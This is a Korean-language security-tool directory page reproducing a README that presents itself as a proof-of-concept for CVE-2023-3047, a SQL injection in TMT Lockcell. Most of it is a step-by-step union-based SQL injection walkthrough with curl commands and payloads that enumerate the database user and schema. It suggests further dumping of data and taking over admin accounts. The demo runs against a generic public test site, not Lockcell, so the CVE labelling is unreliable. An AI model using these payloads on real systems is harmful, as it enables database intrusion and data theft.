Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-3047 — TMT Lockcell의 CVE-2023-3047 SQL 삽입 취약점에 대한 개념 증명 익스플로잇입니다. cURL 및 Burp Suite를 사용한 수동 익스플로잇을 통해 데이터베이스 사용자와 스키마를 열거하는 방법을 보여줍니다. | Kitploit
도구/GitHubGitHub/phamchie/cve-2023-3047
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubphamchie/cve-2023-3047

CVE-2023-3047

TMT Lockcell의 CVE-2023-3047 SQL 삽입 취약점에 대한 개념 증명 익스플로잇입니다. cURL 및 Burp Suite를 사용한 수동 익스플로잇을 통해 데이터베이스 사용자와 스키마를 열거하는 방법을 보여줍니다.

저장소 보기
422년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
  • Telegram : @ghostman_s3c 또는 @Chrome2024
  • BTC 기부 : 17L22i227Keet23QCNaeCyrQ6xfiTQpQJ5

PoC CVE-2023-3047 익스플로잇 방법

설명

TMT Lockcell의 SQL 명령에서 특수 요소의 부적절한 중화('SQL 인젝션') 취약점으로 인해 SQL 인젝션이 발생할 수 있습니다. 이 문제는 Lockcell 15 미만 버전에 영향을 미칩니다.

  • 상세 정보 : https://www.tenable.com/cve/CVE-2023-3047

익스플로잇

먼저 CVE-2023-3047 오류가 있는지 확인합니다. 터미널을 열고 모든 터미널이 cURL 도구를 지원하는지 확인하세요.

  • 웹사이트에서 테스트합니다 : http://testphp.vulnweb.com/listproducts.php?cat=1
  • 이제 명령어를 사용하여 테스트합니다.
  • 명령어 :
root@kitploit:~
curl <your_url_vulnerable> | grep "at line"
  • 입력 후, 만약 100 4976 0 4 --:--:Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1와 같이 표시된다면, 해당 웹사이트는 CVE-2023-3047 오류에 취약한 것입니다.

  • 좋습니다. 이제 이 웹사이트가 인젝션 공격을 차단하는지 테스트해보겠습니다. 다음 명령어를 사용해보세요.

root@kitploit:~
curl <your_url_vulnerable>+Union+Select+1,2,3--+- | grep "The used SELECT"
  • 실행 후 아래 이미지와 같이 표시된다면, 좋은 표적을 찾은 것입니다.

  • 이제 union select 페이로드를 1부터 MySQL 웹사이트의 컬럼 수에 유효한 특정 숫자까지 계속 시도해야 합니다.

  • 좋습니다. 제 목표는 1부터 11까지 유효한 컬럼 번호를 찾는 것입니다. 아래 이미지에서 2개의 완전히 다른 결과를 볼 수 있습니다. 위에는 여전히 "The used SELECT"가 표시되고, 아래에는 표시되지 않습니다.

  • 이제 Google에서 확인하여 위 결과와 일치하는지 검증하겠습니다. 편리하게도 정보를 얻을 수 있는 또 다른 번호를 찾을 수 있습니다.

  • 음, 완전히 유효한 결과인 것 같습니다. 정보를 얻기 위해 주입할 수 있는 3개의 번호가 있습니다.

  • 이제 SQL 명령어를 주입하여 정보를 얻는 연습을 해보겠습니다.

  • 페이로드: +Union+Select+1,2,3,4,5,6,CONCAT(user(),'::',database()),8,9,10,11--+-

root@kitploit:~
curl http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,CONCAT(user(),'::',database()),8,9,10,11--+- | grep "::"
  • 오 이런, 이 명령어는 잘 작동하지 않는 것 같습니다. 페이로드를 URL 인코딩하지 않았기 때문입니다.

  • 이제 제 임무는 사이버 공격을 계속하기 위해 해당 페이로드를 URL 경로로 인코딩하는 것입니다.

  • Burp Suite를 사용하여 인코딩하겠습니다.

  • 이제 Decoder를 선택하고, 화면 왼쪽에서 Encode as를 선택한 다음 URL을 선택하고 페이로드를 입력하세요. 위 오류의 경우 (, )와 같은 특수 문자가 있습니다. 요구 사항을 충족시키기에 충분하지 않으므로 데이터베이스 정보를 얻기 위한 삽입 명령어 부분만 인코딩하겠습니다.

root@kitploit:~
CONCAT(user(),'::',database())
  • 이제 인코딩된 부분을 아래에 복사한 후 공격을 계속합니다.
root@kitploit:~
curl http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,<encode_path_here>,8,9,10,11--+- | grep "::"
  • 입력 후, 게임이 끝났습니다. 사용자 이름과 데이터베이스가 노출되었습니다. 뿐만 아니라 해커는 다른 페이로드를 주입하여 더 많은 정보를 얻을 수 있습니다. 예를 들어 데이터베이스 데이터를 덤프하여 정보를 탈취하거나 웹사이트 관리자 권한을 획득할 수 있습니다.

  • 따라서 게임은 끝났습니다. 사용자 이름은 acuart@localhost이고 데이터베이스 이름은 acuart입니다.

결론

  • MySQL 최신 버전으로 서버를 업데이트하거나 Google에서 위와 같은 네트워크 공격을 방지하는 방법을 검색할 수 있습니다.
  • 저를 팔로우해 주세요. 네트워크 보안에 대한 지식을 공유하겠습니다.
도구 다운로드